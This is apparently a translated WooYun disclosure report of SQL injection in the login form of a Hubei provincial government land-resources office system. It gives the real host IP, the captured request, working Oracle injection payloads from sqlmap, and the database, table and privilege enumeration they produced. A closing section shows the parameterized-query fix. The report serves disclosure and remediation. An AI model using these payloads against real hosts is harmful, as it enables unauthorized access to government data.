WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, online reader -------- http://drop.zone.ci/
2014-01-12: Details sent to the vendor; awaiting vendor handling
2014-01-17: Vendor confirmed; details disclosed to the vendor only
2014-01-27: Details disclosed to core white hats and relevant domain experts
2014-02-06: Details disclosed to regular white hats
2014-02-16: Details disclosed to intern white hats
2014-02-26: Details disclosed to the public

SQL injection in an office system of the Hubei Provincial Department of Land and Resources

Affected URL: http://119.97.204.202/ydegov/index.aspx. Enter any username, password and captcha, and capture the request with Burp:
POST /ydegov/index.aspx HTTP/1.1
Host: 119.97.204.202
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:26.0) Gecko/20100101 Firefox/26.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://119.97.204.202/ydegov/index.aspx
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 125

__VIEWSTATE=%2FwEPDwUIMzIzNTUzMjNkZFZFWpB5ZvJjFSAxmiE3AWpmmBKX&txt_UserName=admin&txt_UserPwd=123&tbValidation=3245&bt_Login=
sqlmap identified the following injection points with a total of 44 HTTP(s) requests:
---
Place: POST
Parameter: txt_UserName
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: __VIEWSTATE=/wEPDwUIMzIzNTUzMjNkZFZFWpB5ZvJjFSAxmiE3AWpmmBKX&txt_UserName=admin' AND 3328=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(102)||CHR(122)||CHR(122)||CHR(113)||(SELECT (CASE WHEN (3328=3328) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(99)||CHR(107)||CHR(101)||CHR(113)||CHR(62))) FROM DUAL) AND 'ZMac'='ZMac&txt_UserPwd=123&tbValidation=3245&bt_Login=

    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: __VIEWSTATE=/wEPDwUIMzIzNTUzMjNkZFZFWpB5ZvJjFSAxmiE3AWpmmBKX&txt_UserName=admin' AND 8031=DBMS_PIPE.RECEIVE_MESSAGE(CHR(73)||CHR(103)||CHR(73)||CHR(74),5) AND 'wdsp'='wdsp&txt_UserPwd=123&tbValidation=3245&bt_Login=
---
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Oracle

The follow-up sqlmap runs (resumed from the cached session, "a total of 0 HTTP(s) requests") reprint the same two injection points, banner and DBMS lines and add the following:

current schema (equivalent to database on Oracle): 'HBYD'

Database: HBYD
[79 tables]
+----------------------+
| 勘查项目受理         |
| 探矿权转让           |
| 采矿申请登记         |
| 采矿转让登记         |
| APP_GROUPS           |
| APP_MENU             |
| APP_ROLE             |
| APP_USER             |
| APP_USERCONFIG       |
| APP_USER_ROLE        |
| AREACODE             |
| BJLCTABLE            |
| DBM_INFO             |
| DBM_TYPE             |
| DICT_MANAGE          |
| DZ02WFYDYSGBYJ       |
| DZ02WFYDYSGHYJ       |
| DZ02WFYDYSHJYJ       |
| DZ02WFYDYSHZYJ       |
| DZ02WFYDYSLYYJ       |
| DZ02WFYDYSSPCWYJ_HS  |
| DZ02WFYDYSZDYJ       |
| DZ02WFYDYSZHYJ       |
| DZ02WFYDYSZYYJ       |
| DZ02WF_YDYS_FSZYJ    |
| DZ05WFYDSPCWYJ_HS    |
| DZ05WFYDSPDJCYJ      |
| DZ05WFYDSPGBCHS      |
| DZ05WFYDSPGHCHS      |
| DZ05WFYDSPLEDYJ      |
| DZ05WFYDSPLYCHS      |
| DZ05WFYDSPSL         |
| DZ05WFYDSPZDCHS      |
| DZ05WFYDSPZFJYJ      |
| DZ05WFYDSPZHYJB      |
| DZ05WF_YDSP_FSZYJ    |
| DZ06WFTDFKCWCYJ      |
| DZ06WFTDFKDJCYJB     |
| DZ06WFTDFKGBCSCB     |
| DZ06WFTDFKGBCYJ      |
| DZ06WFTDFKGHCYJ      |
| DZ06WFTDFKGHSJ       |
| DZ06WFTDFKQTYJB      |
| DZ06WFTDFKZHYJB      |
| EVENTLOG             |
| EVENTLOGTYPE         |
| FWDBX                |
| FWDBX_BZ             |
| FWFH                 |
| FWHQ                 |
| FWNEWDBX             |
| FWNG                 |
| FWSH                 |
| FWTZHQ               |
| FWZGTZ               |
| GONGWENFJB           |
| GWDICT               |
| GWFW                 |
| GWSW                 |
| JSYD_MONEY           |
| K_CASENO             |
| K_SPB                |
| K_S_HSB              |
| K_S_JDB              |
| K_S_SZB              |
| K_S_YCB              |
| K_TK_HS              |
| MOBILEDKMAP          |
| MOBILEOFFICETBL      |
| MOBILE_SMS           |
| RARBLOB              |
| VFDMNGFLDS           |
| VFDMNGTBLS           |
| WORKFLOWHSB          |
| ZSWFPAGEANDEVENTCODE |
| ZSWFRECEIVEDOCFORM   |
| ZSWF_TDZL_AJZT       |
| ZSWF_YDSP_AJZT       |
| ZSWF_YJ              |
+----------------------+
79 tables in total, and 16 databases:

available databases [16]:
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] HBYD
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB
DBA privileges...

Have the developers fix it.
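The defect behind this finding is a login query built by string concatenation, so the fix the developers need is a bound parameter. The block below is an added illustration, not code from the affected system: it shows the vulnerable pattern next to the parameterized one. SQLite stands in for Oracle so it runs offline, the APP_USER table name comes from the report but its two columns are assumed, and the password hashing is simplified for the demonstration.

```python
import hashlib
import hmac
import sqlite3


def hash_password(password):
    # Demo-only hashing so the table does not hold plaintext; a production system uses a
    # salted, slow KDF (PBKDF2, bcrypt, Argon2) instead of a bare SHA-256.
    return hashlib.sha256(password.encode("utf-8")).hexdigest()


def setup_db():
    # Assumed schema: the report lists APP_USER but not its columns.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE APP_USER (USERNAME TEXT PRIMARY KEY, PWD_HASH TEXT NOT NULL)")
    conn.execute("INSERT INTO APP_USER VALUES (?, ?)", ("admin", hash_password("correct-horse")))
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """The pattern that produces the finding: user input spliced straight into the WHERE clause."""
    sql = ("SELECT COUNT(*) FROM APP_USER WHERE USERNAME = '%s' AND PWD_HASH = '%s'"
           % (username, hash_password(password)))
    return conn.execute(sql).fetchone()[0] == 1


def login_safe(conn, username, password):
    """Bound parameter: the username is data, never SQL text, whatever characters it contains."""
    row = conn.execute("SELECT PWD_HASH FROM APP_USER WHERE USERNAME = ?", (username,)).fetchone()
    if row is None:
        # Do the same amount of work for unknown users so response time does not reveal them.
        hmac.compare_digest(hash_password(password), hash_password(""))
        return False
    return hmac.compare_digest(row[0], hash_password(password))


if __name__ == "__main__":
    db = setup_db()
    probe = "admin'--"  # comments out the password check when concatenated
    print("vulnerable, wrong password:", login_vulnerable(db, probe, "wrong"))  # True
    print("parameterized, wrong password:", login_safe(db, probe, "wrong"))     # False
```

With an ADO.NET Oracle provider the equivalent of the `?` placeholder is a named bind variable (`:username`) added through the command's parameter collection; the query text itself never changes. Two further points follow from the report: the application's database account should hold only the grants its own queries need, so that an injection cannot enumerate other schemas the way the database list above shows, and the captcha and ViewState in the request do nothing against this class of bug because the injected value is processed server-side after both checks pass.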
Severity: High
Vulnerability Rank: 11
Confirmed: 2014-01-17 08:34
None